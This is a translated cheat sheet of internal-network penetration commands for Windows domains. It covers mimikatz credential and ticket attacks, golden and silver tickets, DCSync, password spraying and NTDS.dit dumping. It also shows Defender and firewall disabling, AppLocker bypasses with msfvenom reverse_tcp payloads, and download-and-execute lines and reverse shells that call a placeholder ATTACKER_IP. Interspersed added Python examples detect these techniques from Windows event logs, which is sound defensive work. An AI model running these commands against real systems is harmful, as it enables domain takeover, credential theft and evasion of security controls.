A collection of internal network penetration techniques and tools

二叶草
March 25, 2020, 18:59:49

Post-exploitation: lateral movement

Stored credentials

# List the stored credentials
cmdkey /list
# Use them
runas /user:administrator /savecred "cmd.exe /k whoami"

Getting tokens with meterpreter

use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"

Mimikatz pass-the-ticket

Enable-PSRemoting
mimikatz.exe '"kerberos::ptt C:\Users\Public\ticketname.kirbi"' "exit"
Enter-PSSession -ComputerName ECORP

WinRM

$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\user', $pass)
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }
# Evil-WinRM
https://github.com/Hackplayers/evil-winrm
ruby evil-winrm.rb -i 192.168.1.2 -u user -p pass -r evil.corp

Pass-the-hash

Invoke-Mimikatz -Command '"sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command"'

Database links

# PowerUpSQL
https://github.com/NetSPI/PowerUpSQL
Get-SQLServerLink -Instance server -Verbose
powershell.exe -c "Import-Module C:\Users\Public\PowerUpSQL.ps1; Invoke-SQLEscalatePriv -Verbose -Instance ECORP\sql"
# List linked servers
select srvname from master..sysservers;
# Execute commands
Get-SQLServerLinkCrawl -Instance server -Query "exec master..xp_cmdshell 'whoami'"
# Tables of the linked database
select * from openquery("ECORP\FOO", 'select TABLE_NAME from FOO.INFORMATION_SCHEMA.TABLES')
# Query the linked server, then try to enable xp_cmdshell on it
select * from openquery("server", 'select * from master..sysservers')
EXECUTE AS USER = 'internal_user'
EXECUTE ('sp_configure "xp_cmdshell",1;reconfigure;') AT "server"

Golden and silver tickets

# Golden ticket
# Dump the krbtgt account hash (needs elevated domain rights)
lsadump::dcsync /domain:evil.corp /user:krbtgt
lsadump::lsa /inject
lsadump::lsa /patch
lsadump::trust /patch
# Create the ticket
# /rc4 or /krbtgt - the NTLM hash
# /sid - the domain SID, obtained from the krbtgt dump
# /ticket - optional, default is ticket.kirbi
# /groups - optional, default is 513,512,520,518,519
# /id - you can forge a user and supply a valid administrator RID
kerberos::golden /user:user /domain:AD.corp /sid:domains-sid /krbtgt:krbtgt-hash /ticket:ticket.kirbi /groups:501,502,513,512,520,518,519
kerberos::ptt ticket.kirbi
# Check whether the ticket is in the cache
powershell.exe -c "klist"
# Verify the golden ticket
dir \\DC\C$
psexec.exe \\DC cmd.exe
# Purge cached tickets
kerberos::purge
# Metasploit module that loads a golden ticket
post/windows/escalate/golden_ticket
# Silver ticket
# A silver ticket can be used to escalate privileges on the domain
# /target - target host (ex: share.server.local, sql.server.local:1433, ...)
# /service - service name for the ticket (ex: cifs, rpcss, http, mssql, ...)
# Example
kerberos::golden /user:user /domain:domain /sid:domain-sid /target:evilcorp-sql102.evilcorp.local:1433 /service:MSSQLSvc /rc4:service-hash /ptt /id:1103
sqlcmd -S evilcorp-sql102.evilcorp.local
select SYSTEM_USER;
kerberos::golden /user:user /id:500 /domain:targetdomain.com /sid:S-1-5-21-1234567890-123456789-1234567890 /target:targetserver.targetdomain.com /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt
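From the defender's side, the two ticket types above leave distinctive traces in a domain controller's Security log: a forged TGT is injected into the session and never requested from the KDC, so service ticket requests (event 4769) appear with no preceding TGT request (event 4768) from the same account and client, and tickets forged from an NTLM/RC4 hash (/rc4, /krbtgt) are typically RC4-encrypted (type 0x17) in a domain whose real tickets use AES. The following is an added example written for this page, not code from the original post; the event records are constructed and carry only the fields the check needs, and the 10-hour window is the Active Directory default TGT lifetime.

```python
"""Added example (not part of the original post): flag Kerberos events that
look like forged tickets. Sample events below are constructed."""
from datetime import datetime, timedelta

# Constructed 4768 (TGT request) / 4769 (service ticket request) records.
SAMPLE_EVENTS = [
    {"id": 4768, "time": "2020-03-25T09:00:00", "account": "alice", "ip": "10.0.0.5", "etype": "0x12"},
    {"id": 4769, "time": "2020-03-25T09:00:05", "account": "alice", "ip": "10.0.0.5",
     "service": "cifs/FS01", "etype": "0x12"},
    # Host using an injected TGT: RC4 service tickets and no 4768 ever seen for this account/IP.
    {"id": 4769, "time": "2020-03-25T10:15:00", "account": "user", "ip": "10.0.0.99",
     "service": "cifs/DC", "etype": "0x17"},
    {"id": 4769, "time": "2020-03-25T10:15:02", "account": "user", "ip": "10.0.0.99",
     "service": "MSSQLSvc/evilcorp-sql102.evilcorp.local:1433", "etype": "0x17"},
]

TGT_LIFETIME = timedelta(hours=10)  # Active Directory default maximum TGT lifetime


def _parse_time(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S")


def find_forged_ticket_indicators(events, window=TGT_LIFETIME):
    """Return one finding per 4769 that is RC4-encrypted or that has no 4768 from
    the same account/IP within `window` (a golden ticket never asks for a TGT)."""
    ordered = sorted(events, key=lambda e: _parse_time(e["time"]))
    last_tgt = {}  # (account, ip) -> time of the most recent 4768
    findings = []
    for ev in ordered:
        key = (ev["account"].lower(), ev["ip"])
        when = _parse_time(ev["time"])
        if ev["id"] == 4768:
            last_tgt[key] = when
            continue
        if ev["id"] != 4769:
            continue
        reasons = []
        if ev["etype"].lower() == "0x17":  # RC4-HMAC: consistent with a ticket forged from an NTLM key
            reasons.append("rc4_service_ticket")
        tgt_time = last_tgt.get(key)
        if tgt_time is None or when - tgt_time > window:
            reasons.append("tgs_without_recent_tgt")
        if reasons:
            findings.append({"account": ev["account"], "ip": ev["ip"],
                             "service": ev["service"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_forged_ticket_indicators(SAMPLE_EVENTS):
        print(finding)
```

Both checks need the logs of every DC in the site: a client may obtain its TGT from one DC and service tickets from another, so correlating on a single DC produces false "no TGT" hits. Long-lived sessions that renew their TGT (event 4770 rather than 4768) also need to be accounted for before this is used as an alert.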

Domain penetration

# LDAP-based enumeration
enum4linux -a 192.168.1.2
python windapsearch.py -u user -p morph3 -d evil.corp --dc-ip 192.168.1.2
python ad-ldap-enum.py -d contoso.com -l 10.0.0.1 -u Administrator -p P@ssw0rd

Brute-forcing LDAP

# Cracking tool
https://github.com/dafthack/DomainPasswordSpray
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
# Brute-force passwords
./kerbrute_linux_amd64 bruteuser -d evil.corp --dc 192.168.1.2 rockyou.txt morph3
# Enumerate users
./kerbrute_linux_amd64 userenum -d evil.corp --dc 192.168.1.2 users.txt
# Password spray, which avoids locking users out through the failed-attempt threshold
./kerbrute_linux_amd64 passwordspray -d evil.corp --dc 192.168.1.2 users.txt rockyou.txt
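The three kerbrute modes above produce three different failure patterns on the DC, and a detection that only counts failures per account misses the spray entirely, because the spray stays below the lockout threshold by design. The added example below (written for this page, not from the original post) groups DC authentication failures by source address and labels each source as a spray (many accounts, few attempts each), a brute force (one account, many attempts) or user enumeration (many requests for principals that do not exist, which is what userenum produces). The records are constructed; the event IDs and result codes used are 4771 with 0x18 (Kerberos pre-authentication failed), 4625 with 0xC000006A (wrong password) and 4768 with 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN). Thresholds are assumptions to tune per environment.

```python
"""Added example (not part of the original post): separate a password spray
from a brute force and from user enumeration. All records are constructed."""
from collections import defaultdict

SAMPLE_FAILURES = (
    # spray: one source, 25 accounts, one attempt each
    [{"id": 4771, "account": "user%02d" % i, "ip": "10.0.0.99", "code": "0x18"} for i in range(25)]
    # brute force: one source, one account, 40 attempts
    + [{"id": 4625, "account": "administrator", "ip": "10.0.0.77", "code": "0xC000006A"} for _ in range(40)]
    # benign: a user mistyping a password twice
    + [{"id": 4771, "account": "alice", "ip": "10.0.0.5", "code": "0x18"} for _ in range(2)]
    # enumeration: 12 requests for accounts that do not exist
    + [{"id": 4768, "account": "guess%d" % i, "ip": "10.0.0.99", "code": "0x6"} for i in range(12)]
)


def classify_sources(failures, spray_accounts=10, spray_max_per_account=3,
                     bruteforce_attempts=20, enum_unknown=10):
    """Group failures by source IP and return {ip: [labels]} for suspicious sources."""
    per_ip = defaultdict(lambda: {"attempts": defaultdict(int), "unknown": 0})
    for f in failures:
        state = per_ip[f["ip"]]
        if f["id"] == 4768 and f["code"].lower() == "0x6":
            state["unknown"] += 1  # principal unknown: the account does not exist
            continue
        state["attempts"][f["account"].lower()] += 1

    verdicts = {}
    for ip, state in per_ip.items():
        counts = state["attempts"]
        worst = max(counts.values(), default=0)  # most attempts against any single account
        labels = []
        if len(counts) >= spray_accounts and worst <= spray_max_per_account:
            labels.append("password_spray")
        if worst >= bruteforce_attempts:
            labels.append("brute_force")
        if state["unknown"] >= enum_unknown:
            labels.append("user_enumeration")
        if labels:
            verdicts[ip] = labels
    return verdicts


if __name__ == "__main__":
    print(classify_sources(SAMPLE_FAILURES))
```

The spray rule keys on the ratio of accounts to attempts rather than on a total count, which is what distinguishes it from a busy but legitimate source such as a terminal server; for that reason a source that many users share should be excluded or given a higher `spray_accounts` threshold.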

DC Shadow

DCShadow is a newer attack technique that modifies existing data in Active Directory through the legitimate APIs used by domain controllers: it registers a shadow domain controller and has the genuine DCs replicate data from the forged one.

# Look up the user's SID
wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid
# Start an RPC server listener
lsadump::dcshadow /object:"CN=morph3,OU=Business,OU=Users,OU=ECORP,DC=ECORP,DC=local" /attribute:sidhistory /value:sid
# Run in a second mimikatz instance
lsadump::dcshadow /push
# Log off once it completes
# Log back on
lsadump::dcsync /domain:ECORP.local /account:krbtgt
# Retrieves the krbtgt hash
# For the details, search Baidu for dcshadow

DC Sync

lsadump::dcsync /domain:domain /all /csv
lsadump::dcsync /user:krbtgt
#####
https://gist.github.com/monoxgas/9d238accd969550136db
powershell.exe -c "Import-Module .\Invoke-DCSync.ps1; Invoke-DCSync -PWDumpFormat"
#####
python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc$@10.0.0.1
python secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit LOCAL

Bypasses

# Run with the PowerShell execution policy bypassed
powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
# PSByPassCLM
powershell.exe -exec bypass -c

Windows Defender

sc config WinDefend start= disabled
sc stop WinDefend
# PowerShell
Set-MpPreference -DisableRealtimeMonitoring $true
# Remove definitions
"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Firewall

Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off

IP allowlist

New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP
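Each of the defence-disabling steps in the Windows Defender, Firewall and IP allowlist sections above is logged by Windows: Defender writes event 5001 (real-time protection disabled) to its Operational log, the Service Control Manager writes System event 7040 when a service's start type changes, and with firewall policy-change auditing on, the Security log records 4950 (a profile setting changed) and 4946 (a rule added to the exception list). The following added example, written for this page and not from the original post, runs those rules over constructed records and keeps the noise down by flagging 7040 only for protective services, 4950 only when a profile's operational mode is turned off, and 4946 only for an inbound allow-all rule pinned to a single remote address, which is the shape of the New-NetFirewallRule command above. Provider names, field names and the 203.0.113.10 address are constructed for the sample.

```python
"""Added example (not part of the original post): detect defence tampering from
Windows event records. All records and field layouts are constructed."""

# (provider, event id) -> label
TAMPER_RULES = {
    ("Microsoft-Windows-Windows Defender", 5001): "defender_realtime_protection_disabled",
    ("Service Control Manager", 7040): "service_start_type_changed",
    ("Microsoft-Windows-Security-Auditing", 4950): "firewall_profile_setting_changed",
    ("Microsoft-Windows-Security-Auditing", 4946): "firewall_rule_added",
}
# Defender, Windows Firewall and the Defender for Endpoint sensor service names.
PROTECTED_SERVICES = {"windefend", "mpssvc", "sense"}

SAMPLE_RECORDS = [
    {"provider": "Microsoft-Windows-Windows Defender", "id": 5001, "data": {}},
    {"provider": "Service Control Manager", "id": 7040,
     "data": {"service": "WinDefend", "old": "auto start", "new": "disabled"}},
    {"provider": "Service Control Manager", "id": 7040,
     "data": {"service": "Spooler", "old": "auto start", "new": "demand start"}},
    {"provider": "Microsoft-Windows-Security-Auditing", "id": 4950,
     "data": {"profile": "Domain", "setting": "Operational mode", "value": "Off"}},
    {"provider": "Microsoft-Windows-Security-Auditing", "id": 4950,
     "data": {"profile": "Public", "setting": "Log dropped packets", "value": "On"}},
    {"provider": "Microsoft-Windows-Security-Auditing", "id": 4946,
     "data": {"rule": "morph3inbound", "direction": "Inbound", "action": "Allow",
              "protocol": "Any", "remote_address": "203.0.113.10"}},  # constructed address
    {"provider": "Microsoft-Windows-Security-Auditing", "id": 4946,
     "data": {"rule": "Core Networking - DHCP", "direction": "Inbound", "action": "Allow",
              "protocol": "UDP", "remote_address": "Any"}},
]


def detect_defense_tampering(records):
    """Return [{label, detail}] for records that match a tampering rule."""
    findings = []
    for rec in records:
        label = TAMPER_RULES.get((rec["provider"], rec["id"]))
        if label is None:
            continue
        d = rec.get("data", {})
        if label == "service_start_type_changed" and d.get("service", "").lower() not in PROTECTED_SERVICES:
            continue
        if label == "firewall_profile_setting_changed" and not (
                d.get("setting") == "Operational mode" and d.get("value", "").lower() == "off"):
            continue
        if label == "firewall_rule_added" and not (
                d.get("direction") == "Inbound" and d.get("action") == "Allow"
                and d.get("protocol") == "Any" and d.get("remote_address") != "Any"):
            continue
        findings.append({"label": label, "detail": d})
    return findings


if __name__ == "__main__":
    for finding in detect_defense_tampering(SAMPLE_RECORDS):
        print(finding)
```

Because the first step on the page stops the Defender service outright, the Defender Operational log may stop receiving events; the System-log 7040 record and the Security-log firewall records come from other providers and survive that, which is why the rule set does not rely on any single log.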

AppLocker bypass

https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
# Execution bypass via MSBuild.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.56 LPORT=9001 -f csharp -e x86/shikata_ga_nai -i > out.cs
# Replace buf-sc and save it as out.csproj
https://raw.githubusercontent.com/3gstudent/msbuild-inline-task/master/executes%20shellcode.xml
Invoke-WebRequest "http://ATTACKER_IP/payload.csproj" -OutFile "out.csproj"; C:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe .\out.csproj
# Or use the tool below
https://github.com/morph3/Msbuild-payload-generator
sudo python msbuild_gen.py -a x86 -i 10 --lhost 192.168.220.130 --lport 9001 -m

GreatSCT

python GreatSCT.py --ip 192.168.1.56 --port 443 -t Bypass -p installutil/powershell/script.py -c "OBFUSCATION=ascii SCRIPT=/root/script.ps1"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false payload1.exe
python3 GreatSCT.py -t Bypass -p regasm/meterpreter/rev_tcp --ip 192.168.1.56 --port 9001
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U payload.dll

EvilSalsa

# Prepare the payloads
python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll supersecretpass123 evilsalsa.dll.txt
EncrypterAssembly.exe EvilSalsa.dll supersecretpass123 evilsalsa.dll.txt
# Execute the payload
SalseoLoader.exe password http://ATTACKER_IP/evilsalsa.dll.txt reversetcp ATTACKER_IP 9001
# Get an ICMP shell back
python icmpsh_m.py "ATTACKER_IP" "VICTIM_IP"
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp ATTACKER_IP

Miscellaneous

# Change file permissions
icacls text.txt /grant Everyone:F
takeown.exe /f c:\windows\system32\sethc.exe

Downloading files

IEX (New-Object System.Net.WebClient).DownloadString("http://ATTACKER_IP/rev.ps1")
(New-Object System.Net.WebClient).DownloadFile("http://ATTACKER_SERVER/malware.exe", "C:\Windows\Temp\malware.exe")
Invoke-WebRequest "http://ATTACKER_SERVER/malware.exe" -OutFile "C:\Windows\Temp\malware.exe"
certutil.exe -urlcache -split -f "http://127.0.0.1:80/shell.exe" shell.exe

Base64 encoding and decoding

certutil -encode foo.exe foo.b64
certutil -decode foo.b64 foo.exe

Port forwarding

# With plink
plink.exe -l morph3 -pw pass123 192.168.1.56 -R 8080:127.0.0.1:8080
# With meterpreter
portfwd add -l attacker-port -p victim-port -r victim-ip
portfwd add -l 3306 -p 3306 -r 192.168.1.56

PowerShell port scan

0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("VICTIM_IP",$_)) "Port $_ is open!"} 2>$null

Recovering a PowerShell SecureString

######
$user = "morph3"
$file = "morph3-pass.xml"
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, (Get-Content $file | ConvertTo-SecureString)
Invoke-Command -ComputerName ECORP -Credential $cred -Authentication credssp -ScriptBlock { whoami }
######
# $secureString holds the SecureString object to decode
[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureString))
######
$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($password)
$result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)
[System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr)
$result

Running a PowerShell script in a session

Invoke-Command -FilePath scriptname -Session $sessions
Enter-PSSession -Session $sess

Decrypting EFS files with Mimikatz

privilege::debug
token::elevate
crypto::system /file:"C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\thecert" /export
dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id"
# Needs the clear-text password
dpapi::masterkey /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\SID\masterkey" /password:pass123
# After running this command, the exported .der and .pvk files must be saved
dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id" /masterkey:f2c9ea33a990c865e985c496fb8915445895d80b
openssl x509 -inform DER -outform PEM -in blah.der -out public.pem
openssl rsa -inform PVK -outform PEM -in blah.pvk -out private.pem
openssl pkcs12 -in public.pem -inkey private.pem -password pass:randompass -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
# Import the certificate
certutil -user -p randompass -importpfx cert.pfx NoChain,NoRoot
type "C:\Users\Administrator\Documents\encrypted.txt"

Post-exploitation information gathering

Viewing logs

Get-WinEvent -ListLog *
# List the logs as a specific user
$cred = Get-Credential
Get-WinEvent -ListLog * -ComputerName AD1 -Credential $cred
# Read the Security log (process creation command lines from event 4688)
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Select-Object @{name='CommandLine'; expression={$_.Properties[8].Value}}

Dumping passwords

# Metasploit
post/windows/gather/enum_chrome
post/multi/gather/firefox_creds
post/firefox/gather/cookies
post/firefox/gather/passwords
post/windows/gather/forensics/browser_history
post/windows/gather/enum_putty_saved_sessions
# Empire
collection/ChromeDump
collection/FoxDump
collection/netripper
credentials/sessiongopher
# mimikatz
privilege::debug
sekurlsa::logonpasswords

Shadow copy

Copying files out of a shadow copy (NTDS.dit, SYSTEM, etc.)

diskshadow.exe
set context persistent nowriters
add volume C: alias morph3
create
expose %morph3% Z:
delete shadows volume %morph3%
reset

Dump NTDS.dit

secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit -outputfile /tmp/result local
python crackmapexec.py 192.168.1.56 -u morph3 -p pass1234 -d evilcorp.com --ntds drsuapi
# mimikatz
lsadump::lsa /inject
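Most of the tooling in this post runs through signed Windows binaries with recognisable command lines: the MSBuild, InstallUtil and RegAsm invocations in the AppLocker bypass and GreatSCT sections, the certutil download in the file-download section, the `-v 2 -ep bypass` PowerShell launch in the bypass section, MpCmdRun with -RemoveDefinitions in the Windows Defender section, and diskshadow/vssadmin/ntdsutil used to reach NTDS.dit in the shadow copy and dump sections above. One process-creation watchlist covers all of them, so a single added example serves those sections; it is written for this page, not taken from the original post, and matches records shaped like Security event 4688 or Sysmon event 1 (image path, command line, parent image). The records are constructed and the patterns are assumptions derived from the commands on this page.

```python
"""Added example (not part of the original post): match process-creation records
against the living-off-the-land command lines shown on this page.
Sample records are constructed; patterns are assumptions drawn from the page."""
import ntpath
import re

# (label, image-name pattern, command-line pattern), all matched case-insensitively.
WATCHLIST = [
    ("msbuild_project_file_execution", r"^msbuild\.exe$", r"\.(csproj|proj|xml)(\s|$)"),
    ("installutil_uninstall_execution", r"^installutil\.exe$", r"/logfile=\s*/logtoconsole=false"),
    ("regasm_unregister_execution", r"^regasm\.exe$", r"(^|\s)/u(\s|$)"),
    ("certutil_download_or_decode", r"^certutil\.exe$", r"-urlcache|-decode"),
    ("powershell_downgrade_or_bypass", r"^powershell\.exe$",
     r"-v(ersion)?\s+2(\s|$)|-e(p|xec|xecutionpolicy)?\s+bypass|downloadstring"),
    ("defender_definitions_removed", r"^mpcmdrun\.exe$", r"-removedefinitions"),
    ("shadow_copy_tooling", r"^(diskshadow|vssadmin|ntdsutil)\.exe$", r""),  # any invocation
]
COMPILED = [(label, re.compile(img, re.I), re.compile(cmd, re.I)) for label, img, cmd in WATCHLIST]

SAMPLE_PROCESSES = [
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe",
     "cmdline": r"msbuild.exe .\out.csproj",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "cmdline": "InstallUtil.exe /logfile= /LogToConsole=false payload1.exe",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe",
     "cmdline": "regasm.exe /U payload.dll", "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": 'certutil.exe -urlcache -split -f "http://127.0.0.1:80/shell.exe" shell.exe',
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -v 2 -ep bypass -command IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "cmdline": '"C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All',
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\diskshadow.exe", "cmdline": "diskshadow.exe",
     "parent": r"C:\Windows\System32\cmd.exe"},
    # Benign: a solution build from Visual Studio does not carry a .csproj/.xml argument.
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe",
     "cmdline": "msbuild.exe MyApp.sln /t:Build",
     "parent": r"C:\Program Files\Microsoft Visual Studio\devenv.exe"},
    {"image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt",
     "parent": r"C:\Windows\explorer.exe"},
]


def match_process(record):
    """Return the labels of every watchlist entry the record matches."""
    image = ntpath.basename(record["image"])
    return [label for label, img_re, cmd_re in COMPILED
            if img_re.search(image) and cmd_re.search(record["cmdline"])]


def scan_processes(records):
    """Return (label, image basename, parent basename) for each matching record."""
    hits = []
    for rec in records:
        for label in match_process(rec):
            hits.append((label, ntpath.basename(rec["image"]), ntpath.basename(rec["parent"])))
    return hits


if __name__ == "__main__":
    for hit in scan_processes(SAMPLE_PROCESSES):
        print(hit)
```

The parent image is carried through because it is usually the cheapest way to separate a build server's legitimate msbuild.exe from one spawned by cmd.exe or powershell.exe. The watchlist is intentionally only as specific as the commands on this page; renamed binaries and obfuscated arguments need the image hash or the Original File Name field rather than the name, and command-line logging (Audit Process Creation with command line inclusion, or Sysmon) has to be enabled before any of these records exist.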

Other tools

https://github.com/DanMcInerney/icebreaker
https://github.com/BloodHoundAD/BloodHound
https://github.com/EmpireProject/Empire
https://github.com/byt3bl33d3r/DeathStar
https://github.com/byt3bl33d3r/CrackMapExec
https://github.com/cobbr/Covenant
https://github.com/GhostPack/Rubeus
https://github.com/GhostPack/SharpDPAPI
https://github.com/Genetic-Malware/Ebowla
https://github.com/Veil-Framework/Veil
https://github.com/padovah4ck/PSByPassCLM
https://github.com/SecureAuthCorp/impacket

Source: 内网渗透技巧及工具合集 (变化吧门户)